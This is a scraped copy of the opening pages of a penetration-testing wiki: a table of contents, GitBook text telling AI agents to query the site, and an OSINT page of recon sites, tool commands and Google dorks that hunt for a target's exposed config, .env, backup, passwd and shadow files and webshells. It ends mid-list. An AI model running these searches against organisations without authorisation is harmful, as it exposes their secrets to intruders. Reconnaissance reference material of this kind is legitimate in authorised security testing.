# Table of Contents - [/home/six2dez/.pentest-book | Pentest Book](#-home-six2dez-pentest-book-pentest-book) - [Unknown](#unknown) - [Unknown](#unknown) - [Public info gathering | Pentest Book](#public-info-gathering-pentest-book) - [Subdomain Takeover | Pentest Book](#subdomain-takeover-pentest-book) - [Root domains | Pentest Book](#root-domains-pentest-book) - [Network Scanning | Pentest Book](#network-scanning-pentest-book) - [Packet Scanning | Pentest Book](#packet-scanning-pentest-book) - [Host Scanning | Pentest Book](#host-scanning-pentest-book) - [Webs recon | Pentest Book](#webs-recon-pentest-book) - [Subdomain Enum | Pentest Book](#subdomain-enum-pentest-book) - [SSL/TLS | Pentest Book](#ssl-tls-pentest-book) - [Files | Pentest Book](#files-pentest-book) - [Reverse Shells | Pentest Book](#reverse-shells-pentest-book) - [Payloads | Pentest Book](#payloads-pentest-book) - [Ports | Pentest Book](#ports-pentest-book) - [Pivoting | Pentest Book](#pivoting-pentest-book) - [File transfer | Pentest Book](#file-transfer-pentest-book) - [Privilege Escalation | Pentest Book](#privilege-escalation-pentest-book) - [PS tips & tricks | Pentest Book](#ps-tips-tricks-pentest-book) - [Cloud Info Gathering | Pentest Book](#cloud-info-gathering-pentest-book) - [General | Pentest Book](#general-pentest-book) - [Web Exploits & C2 | Pentest Book](#web-exploits-c2-pentest-book) - [Buffer Overflow | Pentest Book](#buffer-overflow-pentest-book) - [Cloud | Pentest Book](#cloud-pentest-book) - [tools everywhere | Pentest Book](#tools-everywhere-pentest-book) - [Web Attacks | Pentest Book](#web-attacks-pentest-book) - [macOS | Pentest Book](#macos-pentest-book) - [Master assessment mindmaps | Pentest Book](#master-assessment-mindmaps-pentest-book) - [Online hashes cracked | Pentest Book](#online-hashes-cracked-pentest-book) - [Modern C2 Frameworks | Pentest Book](#modern-c2-frameworks-pentest-book) - [Code review | Pentest Book](#code-review-pentest-book) - [Linux Kernel Exploits | Pentest Book](#linux-kernel-exploits-pentest-book) - [BugBounty | Pentest Book](#bugbounty-pentest-book) - [Random | Pentest Book](#random-pentest-book) - [iOS | Pentest Book](#ios-pentest-book) - [Burp Suite | Pentest Book](#burp-suite-pentest-book) - [General Info | Pentest Book](#general-info-pentest-book) - [VirtualBox | Pentest Book](#virtualbox-pentest-book) - [Linux | Pentest Book](#linux-pentest-book) - [Exploiting | Pentest Book](#exploiting-pentest-book) - [GCP | Pentest Book](#gcp-pentest-book) - [General | Pentest Book](#general-pentest-book) - [Quick tricks | Pentest Book](#quick-tricks-pentest-book) - [CDN - Comain Fronting | Pentest Book](#cdn-comain-fronting-pentest-book) - [Password cracking | Pentest Book](#password-cracking-pentest-book) - [Crawl/Fuzz | Pentest Book](#crawl-fuzz-pentest-book) - [AD | Pentest Book](#ad-pentest-book) - [Bruteforcing | Pentest Book](#bruteforcing-pentest-book) - [Android | Pentest Book](#android-pentest-book) - [Wireless Testing | Pentest Book](#wireless-testing-pentest-book) - [Reporting | Pentest Book](#reporting-pentest-book) - [Automotive Security | Pentest Book](#automotive-security-pentest-book) - [Internal Pentest | Pentest Book](#internal-pentest-pentest-book) - [Hardware Hacking | Pentest Book](#hardware-hacking-pentest-book) - [IoT Protocols | Pentest Book](#iot-protocols-pentest-book) - [Social Engineering | Pentest Book](#social-engineering-pentest-book) - [Purple Team | Pentest Book](#purple-team-pentest-book) - [Serverless Security | Pentest Book](#serverless-security-pentest-book) - [Wordlist Reference | Pentest Book](#wordlist-reference-pentest-book) - [K8s Admission Bypass | Pentest Book](#k8s-admission-bypass-pentest-book) - [Kerberos | Pentest Book](#kerberos-pentest-book) --- # /home/six2dez/.pentest-book | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/readme.md) . Thanks to visit this site, please consider enhance this book with some awesome tools or techniques you know, you can contact me by Telegram([@six2dez](https://t.me/six2dez) ), Twitter([@six2dez1](https://twitter.com/Six2dez1) ) or Discord([six2dez#8201](https://discordapp.com/users/six2dez#8201) ), GitHub pull request is welcomed too ;) **Hack 'em all** ### [](https://www.pentest-book.com/#usage-just-use-the-search-bar-at-the-upper-or-navigate-through-the-sections-of-the-left-zone.-enjoy) **Usage: Just use the search bar at the upper or navigate through the sections of the left zone. Enjoy it** 😊 **Don't you know where to go now?** Let me introduce you to some of the most **popular pages** on this wiki: * Know your target! Make a proper [recon](https://www.pentest-book.com/recon/public-info-gathering) ! * What can you do in those strange [ports](https://www.pentest-book.com/enumeration/ports) ? * Doing a [web pentest](https://www.pentest-book.com/enumeration/web) ? Don't forget to check out any of these common attacks! * Do you have the same hype as me with [cloud](https://www.pentest-book.com/enumeration/cloud) services? They also have their vulnerabilities * Stuck again with Windows and [Kerberos](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks) ? Here is my cheatsheet * The mobile world does not stop growing, see my tips for [Android](https://www.pentest-book.com/mobile/android) and [iOS](https://www.pentest-book.com/mobile/ios) * [Burp Suite](https://www.pentest-book.com/others/burp) is the tool most loved by everyone, but you have to know a few tricks, also check my [preferred extensions](https://www.pentest-book.com/others/burp#preferred-extensions) * I'm really proud of [Pentesting Web Checklist](https://www.pentest-book.com/others/web-checklist) * If you want to know which web fuzzer fits you best, take a look at the [comparison](https://www.pentest-book.com/others/web-fuzzers-comparision) . **Important note**: I use this wiki daily for my work and I am constantly updating it. I'm very sorry if a link to a page changes or I move it, if you need something you are free to contact me. You can support this work buying me a coffee: [![Logo](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2Fcdn.buymeacoffee.com%2Fstatic%2Fprod%2F12.2.7%2Fbuild%2Fassets%2Fapple-icon-180x180-912350ec.png&width=20&dpr=3&quality=100&sign=720d32d1&sv=2)six2dez is sharing knowledgeBuy Me a Coffee](https://www.buymeacoffee.com/six2dez) ### [](https://www.pentest-book.com/#stargazers-over-time) Stargazers over time ![](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2Fstarchart.cc%2Fsix2dez%2Fpentest-book.svg&width=768&dpr=3&quality=100&sign=eab325f3&sv=2) Stargazers over time [NextPublic info gathering](https://www.pentest-book.com/recon/public-info-gathering) Last updated 5 months ago Was this helpful? --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://www.pentest-book.com/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://www.pentest-book.com/readme.md). # /home/six2dez/.pentest-book Thanks to visit this site, please consider enhance this book with some awesome tools or techniques you know, you can contact me by Telegram(\[@six2dez\](https://t.me/six2dez)), Twitter(\[@six2dez1\](https://twitter.com/Six2dez1)) or Discord(\[six2dez#8201\](https://discordapp.com/users/six2dez#8201)), GitHub pull request is welcomed too ;) \*\*Hack 'em all\*\* ### \*\*Usage: Just use the search bar at the upper or navigate through the sections of the left zone. Enjoy it\*\* :blush: \*\*Don't you know where to go now?\*\* Let me introduce you to some of the most \*\*popular pages\*\* on this wiki: \* Know your target! Make a proper \[recon\](/recon/public-info-gathering.md)! \* What can you do in those strange \[ports\](/enumeration/ports.md)? \* Doing a \[web pentest\](/enumeration/web.md)? Don't forget to check out any of these common attacks! \* Do you have the same hype as me with \[cloud \](/enumeration/cloud.md)services? They also have their vulnerabilities \* Stuck again with Windows and \[Kerberos\](/post-exploitation/windows/ad/kerberos-attacks.md)? Here is my cheatsheet \* The mobile world does not stop growing, see my tips for \[Android \](/mobile/android.md)and \[iOS\](/mobile/ios.md) \* \[Burp Suite \](/others/burp.md)is the tool most loved by everyone, but you have to know a few tricks, also check my \[preferred extensions\](/others/burp.md#preferred-extensions) \* I'm really proud of \[Pentesting Web Checklist\](/others/web-checklist.md) \* If you want to know which web fuzzer fits you best, take a look at the \[comparison\](/others/web-fuzzers-comparision.md). \*\*Important note\*\*: I use this wiki daily for my work and I am constantly updating it. I'm very sorry if a link to a page changes or I move it, if you need something you are free to contact me. You can support this work buying me a coffee: {% embed url="" %} ### Stargazers over time !\[Stargazers over time\](https://starchart.cc/six2dez/pentest-book.svg) --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://www.pentest-book.com/readme.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \# Pentest Book ## Pentest Book - \[/home/six2dez/.pentest-book\](https://www.pentest-book.com/readme.md): This book contains a bunch of info, scripts and knowledge used during my pentests. - \[Public info gathering\](https://www.pentest-book.com/recon/public-info-gathering.md) - \[Root domains\](https://www.pentest-book.com/recon/domain-enum.md) - \[Subdomain Enum\](https://www.pentest-book.com/recon/subdomain-enum.md) - \[Subdomain Takeover\](https://www.pentest-book.com/recon/subdomain-enum/subdomain-takeover.md) - \[Webs recon\](https://www.pentest-book.com/recon/webs-recon.md) - \[Network Scanning\](https://www.pentest-book.com/recon/network-scanning.md) - \[Host Scanning\](https://www.pentest-book.com/recon/host-scanning.md) - \[Packet Scanning\](https://www.pentest-book.com/recon/packet-scanning.md) - \[Files\](https://www.pentest-book.com/enumeration/files.md) - \[SSL/TLS\](https://www.pentest-book.com/enumeration/ssl-tls.md) - \[Ports\](https://www.pentest-book.com/enumeration/ports.md) - \[Web Attacks\](https://www.pentest-book.com/enumeration/web.md) - \[General Info\](https://www.pentest-book.com/enumeration/web/general-info.md) - \[Quick tricks\](https://www.pentest-book.com/enumeration/web/quick-tricks.md) - \[Header injections\](https://www.pentest-book.com/enumeration/web/header-injections.md) - \[Bruteforcing\](https://www.pentest-book.com/enumeration/web/bruteforcing.md) - \[Online hashes cracked\](https://www.pentest-book.com/enumeration/web/online-hashes-cracked.md) - \[Crawl/Fuzz\](https://www.pentest-book.com/enumeration/web/crawl-fuzz.md) - \[LFI/RFI\](https://www.pentest-book.com/enumeration/web/lfi-rfi.md) - \[File upload\](https://www.pentest-book.com/enumeration/web/upload-bypasses.md) - \[SQLi\](https://www.pentest-book.com/enumeration/web/sqli.md) - \[SSRF\](https://www.pentest-book.com/enumeration/web/ssrf.md) - \[Open redirects\](https://www.pentest-book.com/enumeration/web/open-redirects.md) - \[XSS\](https://www.pentest-book.com/enumeration/web/xss.md) - \[CSP\](https://www.pentest-book.com/enumeration/web/csp.md) - \[XXE\](https://www.pentest-book.com/enumeration/web/xxe.md) - \[Cookie Padding\](https://www.pentest-book.com/enumeration/web/cookie-padding.md) - \[Webshells\](https://www.pentest-book.com/enumeration/web/web-shells.md) - \[CORS\](https://www.pentest-book.com/enumeration/web/cors.md) - \[CSRF\](https://www.pentest-book.com/enumeration/web/csrf.md) - \[Web Cache Poisoning\](https://www.pentest-book.com/enumeration/web/web-cache-poisoning.md) - \[Broken Links\](https://www.pentest-book.com/enumeration/web/broken-links.md) - \[Clickjacking\](https://www.pentest-book.com/enumeration/web/clickjacking.md) - \[HTTP Request Smuggling\](https://www.pentest-book.com/enumeration/web/request-smuggling.md) - \[Web Sockets\](https://www.pentest-book.com/enumeration/web/web-sockets.md) - \[CRLF\](https://www.pentest-book.com/enumeration/web/crlf.md) - \[IDOR\](https://www.pentest-book.com/enumeration/web/idor.md) - \[Web Cache Deception\](https://www.pentest-book.com/enumeration/web/web-cache-deception.md) - \[Session fixation\](https://www.pentest-book.com/enumeration/web/session-fixation.md) - \[Email attacks\](https://www.pentest-book.com/enumeration/web/email-attacks.md) - \[Pastejacking\](https://www.pentest-book.com/enumeration/web/pastejacking.md) - \[HTTP Parameter pollution\](https://www.pentest-book.com/enumeration/web/parameter-pollution.md) - \[SSTI\](https://www.pentest-book.com/enumeration/web/ssti.md) - \[Prototype Pollution\](https://www.pentest-book.com/enumeration/web/prototype-pollution.md) - \[Command Injection\](https://www.pentest-book.com/enumeration/web/command-injection.md) - \[Deserialization\](https://www.pentest-book.com/enumeration/web/deserialization.md) - \[DNS rebinding\](https://www.pentest-book.com/enumeration/web/dns-rebinding.md) - \[API Security\](https://www.pentest-book.com/enumeration/web/api-security.md) - \[Supply Chain Attacks\](https://www.pentest-book.com/enumeration/web/supply-chain.md) - \[Race Conditions\](https://www.pentest-book.com/enumeration/web/race-conditions.md) - \[GraphQL Deep Dive\](https://www.pentest-book.com/enumeration/web/graphql-deep.md) - \[OAuth/PKCE Attacks\](https://www.pentest-book.com/enumeration/web/oauth-attacks.md) - \[VHosts\](https://www.pentest-book.com/enumeration/web/vhosts.md) - \[Tabnabbing\](https://www.pentest-book.com/enumeration/web/tabnabbing.md) - \[Web Technologies\](https://www.pentest-book.com/enumeration/webservices.md) - \[APIs\](https://www.pentest-book.com/enumeration/webservices/apis.md) - \[JS\](https://www.pentest-book.com/enumeration/webservices/js.md) - \[ASP.NET\](https://www.pentest-book.com/enumeration/webservices/.net.md) - \[JWT\](https://www.pentest-book.com/enumeration/webservices/jwt.md) - \[GitHub\](https://www.pentest-book.com/enumeration/webservices/github.md) - \[GitLab\](https://www.pentest-book.com/enumeration/webservices/gitlab.md) - \[WAFs\](https://www.pentest-book.com/enumeration/webservices/wafs.md) - \[Firebird\](https://www.pentest-book.com/enumeration/webservices/firebird.md) - \[Wordpress\](https://www.pentest-book.com/enumeration/webservices/wordpress.md) - \[WebDav\](https://www.pentest-book.com/enumeration/webservices/webdav.md) - \[Joomla\](https://www.pentest-book.com/enumeration/webservices/joomla.md) - \[Jenkins\](https://www.pentest-book.com/enumeration/webservices/jenkins.md) - \[IIS\](https://www.pentest-book.com/enumeration/webservices/iis.md) - \[VHosts\](https://www.pentest-book.com/enumeration/webservices/vhosts.md) - \[Firebase\](https://www.pentest-book.com/enumeration/webservices/firebase.md) - \[OWA\](https://www.pentest-book.com/enumeration/webservices/owa.md) - \[OAuth\](https://www.pentest-book.com/enumeration/webservices/oauth.md) - \[Flask\](https://www.pentest-book.com/enumeration/webservices/flask.md) - \[Symfony && Twig\](https://www.pentest-book.com/enumeration/webservices/symfony-and-and-twig.md) - \[Drupal\](https://www.pentest-book.com/enumeration/webservices/drupal.md) - \[NoSQL (MongoDB, CouchDB)\](https://www.pentest-book.com/enumeration/webservices/nosql-and-and-mongodb.md) - \[PHP\](https://www.pentest-book.com/enumeration/webservices/php.md) - \[RoR (Ruby on Rails)\](https://www.pentest-book.com/enumeration/webservices/ror-ruby-on-rails.md) - \[JBoss - Java Deserialization\](https://www.pentest-book.com/enumeration/webservices/jboss-java-deserialization.md) - \[OneLogin - SAML Login\](https://www.pentest-book.com/enumeration/webservices/onelogin-saml-login.md) - \[Flash SWF\](https://www.pentest-book.com/enumeration/webservices/flash-swf.md) - \[Nginx\](https://www.pentest-book.com/enumeration/webservices/nginx.md) - \[Python\](https://www.pentest-book.com/enumeration/webservices/python.md) - \[Tomcat\](https://www.pentest-book.com/enumeration/webservices/tomcat.md) - \[Adobe AEM\](https://www.pentest-book.com/enumeration/webservices/adobe-aem.md) - \[Magento\](https://www.pentest-book.com/enumeration/webservices/magento.md) - \[SAP\](https://www.pentest-book.com/enumeration/webservices/sap.md) - \[MFA/2FA\](https://www.pentest-book.com/enumeration/webservices/mfa.md) - \[GWT\](https://www.pentest-book.com/enumeration/webservices/gwt.md) - \[Jira\](https://www.pentest-book.com/enumeration/webservices/jira.md) - \[OIDC (Open ID Connect)\](https://www.pentest-book.com/enumeration/webservices/oidc-open-id-connect.md) - \[ELK\](https://www.pentest-book.com/enumeration/webservices/elk.md) - \[Sharepoint\](https://www.pentest-book.com/enumeration/webservices/sharepoint.md) - \[CI/CD Security\](https://www.pentest-book.com/enumeration/webservices/ci-cd-security.md) - \[SaaS Testing\](https://www.pentest-book.com/enumeration/webservices/saas-testing.md) - \[Others\](https://www.pentest-book.com/enumeration/webservices/others.md) - \[Cloud\](https://www.pentest-book.com/enumeration/cloud.md) - \[General\](https://www.pentest-book.com/enumeration/cloud/general.md) - \[Cloud Info Gathering\](https://www.pentest-book.com/enumeration/cloud/cloud-info-recon.md) - \[AWS\](https://www.pentest-book.com/enumeration/cloud/aws.md) - \[Azure\](https://www.pentest-book.com/enumeration/cloud/azure.md) - \[GCP\](https://www.pentest-book.com/enumeration/cloud/gcp.md) - \[Docker && Kubernetes\](https://www.pentest-book.com/enumeration/cloud/docker-and-and-kubernetes.md) - \[Serverless Security\](https://www.pentest-book.com/enumeration/cloud/serverless.md) - \[CDN - Comain Fronting\](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting.md) - \[Cloud AI Security\](https://www.pentest-book.com/enumeration/cloud/cloud-ai-security.md) - \[K8s Admission Bypass\](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass.md) - \[Payloads\](https://www.pentest-book.com/exploitation/payloads.md) - \[Reverse Shells\](https://www.pentest-book.com/exploitation/reverse-shells.md) - \[File transfer\](https://www.pentest-book.com/exploitation/file-transfer.md) - \[Privilege Escalation\](https://www.pentest-book.com/exploitation/privilege-escalation.md) - \[Buffer Overflow\](https://www.pentest-book.com/exploitation/buffer-overflow.md) - \[Web Exploits & C2\](https://www.pentest-book.com/exploitation/web-exploits.md) - \[Linux Kernel Exploits\](https://www.pentest-book.com/exploitation/linux-kernel-2024.md) - \[Modern C2 Frameworks\](https://www.pentest-book.com/exploitation/modern-c2.md) - \[Linux\](https://www.pentest-book.com/post-exploitation/linux.md) - \[macOS\](https://www.pentest-book.com/post-exploitation/macos.md) - \[Pivoting\](https://www.pentest-book.com/post-exploitation/pivoting.md) - \[Windows\](https://www.pentest-book.com/post-exploitation/windows.md) - \[Win11/Server2022 Evasion\](https://www.pentest-book.com/post-exploitation/windows/win11-evasion.md) - \[AD\](https://www.pentest-book.com/post-exploitation/windows/ad.md) - \[Kerberos\](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks.md) - \[PS tips & tricks\](https://www.pentest-book.com/post-exploitation/windows/ps-tips-and-tricks.md) - \[General\](https://www.pentest-book.com/mobile/general.md) - \[Android\](https://www.pentest-book.com/mobile/android.md) - \[iOS\](https://www.pentest-book.com/mobile/ios.md) - \[Burp Suite\](https://www.pentest-book.com/others/burp.md) - \[Password cracking\](https://www.pentest-book.com/others/password-cracking.md) - \[VirtualBox\](https://www.pentest-book.com/others/virtualbox.md) - \[LLM/AI/ML/prompt testing\](https://www.pentest-book.com/others/llm-ai-ml-prompt-testing.md) - \[Code review\](https://www.pentest-book.com/others/code-review.md) - \[Pentesting Web checklist\](https://www.pentest-book.com/others/web-checklist.md) - \[Internal Pentest\](https://www.pentest-book.com/others/internal-pentest.md) - \[Web fuzzers review\](https://www.pentest-book.com/others/web-fuzzers-comparision.md) - \[Recon suites review\](https://www.pentest-book.com/others/recon-suites-review.md) - \[Subdomain tools review\](https://www.pentest-book.com/others/subdomain-tools-review.md) - \[Random\](https://www.pentest-book.com/others/dictionaries.md) - \[Master assessment mindmaps\](https://www.pentest-book.com/others/master-assessment-mindmap.md) - \[BugBounty\](https://www.pentest-book.com/others/bugbounty.md) - \[Exploiting\](https://www.pentest-book.com/others/exploiting.md) - \[tools everywhere\](https://www.pentest-book.com/others/tools-everywhere.md) - \[RT/EDR\](https://www.pentest-book.com/others/rt-edr.md) - \[Wireless Testing\](https://www.pentest-book.com/others/wireless.md) - \[Social Engineering\](https://www.pentest-book.com/others/social-engineering.md) - \[Reporting\](https://www.pentest-book.com/others/reporting.md) - \[Hardware Hacking\](https://www.pentest-book.com/others/hardware.md) - \[Purple Team\](https://www.pentest-book.com/others/purple-team.md) - \[IoT Protocols\](https://www.pentest-book.com/others/iot-protocols.md) - \[Automotive Security\](https://www.pentest-book.com/others/automotive-security.md) - \[WebAuthn & Passkeys\](https://www.pentest-book.com/others/webauthn-passkeys.md) - \[Browser Extension Security\](https://www.pentest-book.com/others/browser-extension-security.md) - \[Tool Index\](https://www.pentest-book.com/others/tool-index.md) - \[Attack Index\](https://www.pentest-book.com/others/attack-index.md) - \[Wordlist Reference\](https://www.pentest-book.com/others/wordlist-reference.md) - \[Learning Path\](https://www.pentest-book.com/others/learning-path.md) - \[Lab Setup Guide\](https://www.pentest-book.com/others/lab-setup-guide.md) - \[Automation & Scripting\](https://www.pentest-book.com/others/automation-scripting.md) --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on a page URL with the \`ask\` query parameter: \`\`\` GET https://www.pentest-book.com/readme.md?ask= \`\`\` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Public info gathering | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/recon/public-info-gathering.md) . > **Skill Level**: Beginner **Prerequisites**: None - good starting point [](https://www.pentest-book.com/recon/public-info-gathering#osint-resources) OSINT resources ------------------------------------------------------------------------------------------------- Copy https://osintframework.com/ https://i-intelligence.eu/uploads/public-documents/OSINT_Handbook_2020.pdf https://start.me/p/DPYPMz/the-ultimate-osint-collection https://docs.google.com/spreadsheets/d/18rtqh8EG2q1xBo2cLNyhIDuK9jrPGwYr9DI2UncoqJQ https://cipher387.github.io/ [](https://www.pentest-book.com/recon/public-info-gathering#osint-websites) OSINT websites ----------------------------------------------------------------------------------------------- Copy # Multipurpose https://shodan.io/ https://censys.io/ https://onyphe.io/ https://app.netlas.io/ https://hunter.how/ https://fofa.so/ https://fullhunt.io/ https://www.zoomeye.org/ https://www.criminalip.io/ https://leakix.net/ https://www.yougetsignal.com/ https://intelx.io/ https://pentest-tools.com/ https://gofindwhois.com/ https://gofindwho.com/ # Track website changes https://visualping.io/ https://web.archive.org # Companies info https://opencorporates.com/companies # Domain Recon https://www.robtex.com/ https://centralops.net https://viewdns.info/ https://phpinfo.me/domain http://bgp.he.net/ https://bgpview.io/ https://suip.biz/ https://dnsdumpster.com/ https://www.whoxy.com/ http://ipv4info.com/ https://rapiddns.io/ https://myip.ms/ https://www.reversewhois.io/? https://www.whoxy.com/reverse-whois/ https://reverse-whois.whoisxmlapi.com/api https://host.io/dashboard https://completedns.com/dns-history/ # Analytics https://mmhdan.herokuapp.com/ https://publicwww.com/ https://intelx.io/tools?tab=analytics https://dnslytics.com/reverse-analytics https://builtwith.com/ # Mailserver blacklists http://multirbl.valli.org/ # Verify emails https://tools.emailhippo.com/ # Dark web exposure https://immuniweb.com/radar/ # New acquisitions https://crunchbase.com/ # Public APIs https://www.postman.com/explore/ https://rapidapi.com/ # APIs Recon https://serene-agnesi-57a014.netlify.app/ # Exif Data https://exif-viewer.com [](https://www.pentest-book.com/recon/public-info-gathering#general-aio) General / AIO ------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/recon/public-info-gathering#whois-registrant-tools) Whois/Registrant Tools --------------------------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/recon/public-info-gathering#dorks) Dorks ----------------------------------------------------------------------------- [![Logo](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2Fgithub.com%2Ffluidicon.png&width=20&dpr=3&quality=100&sign=21fe07f0&sv=2)GitHub - cipher387/Dorks-collections-list: List of Github repositories and articles with list of dorks for different search enginesGitHub](https://github.com/cipher387/Dorks-collections-list) ### [](https://www.pentest-book.com/recon/public-info-gathering#google) Google #### [](https://www.pentest-book.com/recon/public-info-gathering#tools) Tools #### [](https://www.pentest-book.com/recon/public-info-gathering#dorks-1) Dorks ### [](https://www.pentest-book.com/recon/public-info-gathering#github) GitHub #### [](https://www.pentest-book.com/recon/public-info-gathering#tools-1) Tools #### [](https://www.pentest-book.com/recon/public-info-gathering#dorks-2) Dorks ### [](https://www.pentest-book.com/recon/public-info-gathering#shodan) Shodan #### [](https://www.pentest-book.com/recon/public-info-gathering#dorks-3) Dorks [](https://www.pentest-book.com/recon/public-info-gathering#asn-cidr-tools) ASN/CIDR Tools ----------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/recon/public-info-gathering#credentials-leaks) Credentials leaks ----------------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/recon/public-info-gathering#email-tools) Email tools ----------------------------------------------------------------------------------------- [](https://www.pentest-book.com/recon/public-info-gathering#git-tools) GIT tools ------------------------------------------------------------------------------------- [](https://www.pentest-book.com/recon/public-info-gathering#metadata) Metadata ----------------------------------------------------------------------------------- [](https://www.pentest-book.com/recon/public-info-gathering#social-media) Social Media ------------------------------------------------------------------------------------------- [Previous/home/six2dez/.pentest-book](https://www.pentest-book.com/) [NextRoot domains](https://www.pentest-book.com/recon/domain-enum) Last updated 5 months ago Was this helpful? * [OSINT resources](https://www.pentest-book.com/recon/public-info-gathering#osint-resources) * [OSINT websites](https://www.pentest-book.com/recon/public-info-gathering#osint-websites) * [General / AIO](https://www.pentest-book.com/recon/public-info-gathering#general-aio) * [Whois/Registrant Tools](https://www.pentest-book.com/recon/public-info-gathering#whois-registrant-tools) * [Dorks](https://www.pentest-book.com/recon/public-info-gathering#dorks) * [Google](https://www.pentest-book.com/recon/public-info-gathering#google) * [GitHub](https://www.pentest-book.com/recon/public-info-gathering#github) * [Shodan](https://www.pentest-book.com/recon/public-info-gathering#shodan) * [ASN/CIDR Tools](https://www.pentest-book.com/recon/public-info-gathering#asn-cidr-tools) * [Credentials leaks](https://www.pentest-book.com/recon/public-info-gathering#credentials-leaks) * [Email tools](https://www.pentest-book.com/recon/public-info-gathering#email-tools) * [GIT tools](https://www.pentest-book.com/recon/public-info-gathering#git-tools) * [Metadata](https://www.pentest-book.com/recon/public-info-gathering#metadata) * [Social Media](https://www.pentest-book.com/recon/public-info-gathering#social-media) Was this helpful? Copy # https://github.com/OWASP/Amass # Get ASN amass intel -org "whatever" # Reverse whois amass intel -active -asn NUMBER -whois -d domain.com # SSL Cert Grabbing amass enum -active -d example.com -cidr IF.YOU.GOT.THIS/24 -asn NUMBER # https://github.com/smicallef/spiderfoot spiderfoot -s domain.com # https://github.com/j3ssie/Osmedeus python3 osmedeus.py -t example.com # https://github.com/thewhiteh4t/FinalRecon python3 finalrecon.py --full https://example.com # https://github.com/laramies/theHarvester theHarvester -d domain.com -b all # https://github.com/lanmaster53/recon-ng recon-ng Copy # https://github.com/jpf/domain-profiler ./profile target.com # Standard whois tool whois # Whoxy api # https://www.whoxy.com/ # Whoxy clients # https://github.com/MilindPurswani/whoxyrm # https://github.com/vysecurity/DomLink # Registrant's domains related # https://github.com/harleo/knockknock knockknock -n "companyORregistrant" -p # Bulk whois # https://github.com/melbadry9/WhoEnum Copy # Google Dorks Cli # https://github.com/six2dez/dorks_hunter python3 dorks_hunter.py -d domain.com # Google Dork builder http://advangle.com/ Copy # Google dorks helper https://dorks.faisalahmed.me/ # Ip search by dorking https://0iq.me/gip/ # Code share sites site:http://ideone.com | site:http://codebeautify.org | site:http://codeshare.io | site:http://codepen.io | site:http://repl.it | site:http://jsfiddle.net "company" # GitLab/GitHub/Bitbucket site:github.com | site:gitlab.com | site:bitbucket.org "company" # Stackoverflow site:stackoverflow.com "target.com" # Project management sites site:http://trello.com | site:*.atlassian.net "company" # Pastebin-like sites site:http://justpaste.it | site:http://pastebin.com "company" # Config files site:target.com ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:env | ext:ini # Database files site:target.com ext:sql | ext:dbf | ext:mdb # Backup files site:target.com ext:bkf | ext:bkp | ext:bak | ext:old | ext:backup # .git folder inurl:"/.git" target.com -github # Exposed documents site:target.com ext:doc | ext:docx | ext:odt | ext:pdf | ext:rtf | ext:sxw | ext:psw | ext:ppt | ext:pptx | ext:pps | ext:csv # Other files site:target.com intitle:index.of | ext:log | ext:php intitle:phpinfo "published by the PHP Group" | inurl:shell | inurl:backdoor | inurl:wso | inurl:cmd | shadow | passwd | boot.ini | inurl:backdoor | inurl:readme | inurl:license | inurl:install | inurl:setup | inurl:config | inurl:"/phpinfo.php" | inurl:".htaccess" | ext:swf # SQL errors site:target.com intext:"sql syntax near" | intext:"syntax error has occurred" | intext:"incorrect syntax near" | intext:"unexpected end of SQL command" | intext:"Warning: mysql_connect()" | intext:"Warning: mysql_query()" | intext:"Warning: pg_connect()" # PHP errors site:target.com "PHP Parse error" | "PHP Warning" | "PHP Error" # Login pages site:target.com inurl:signup | inurl:register | intitle:Signup # Open redirects site:target.com inurl:redir | inurl:url | inurl:redirect | inurl:return | inurl:src=http | inurl:r=http # Apache Struts RCE site:target.com ext:action | ext:struts | ext:do # Search in pastebin site:pastebin.com target.com # Linkedin employees site:linkedin.com employees target.com # Wordpress files site:target.com inurl:wp-content | inurl:wp-includes # Subdomains site:*.target.com # Sub-subdomains site:*.*.target.com #Find S3 Buckets site:.s3.amazonaws.com | site:http://storage.googleapis.com | site:http://amazonaws.com "target" # Traefik intitle:traefik inurl:8080/dashboard "target" # Jenkins intitle:"Dashboard [Jenkins]" # Other 3rd parties sites https://www.google.com/search?q=site%3Agitter.im%20%7C%20site%3Apapaly.com%20%7C%20site%3Aproductforums.google.com%20%7C%20site%3Acoggle.it%20%7C%20site%3Areplt.it%20%7C%20site%3Aycombinator.com%20%7C%20site%3Alibraries.io%20%7C%20site%3Anpm.runkit.com%20%7C%20site%3Anpmjs.com%20%7C%20site%3Ascribd.com%20%22united%22 # Backup files 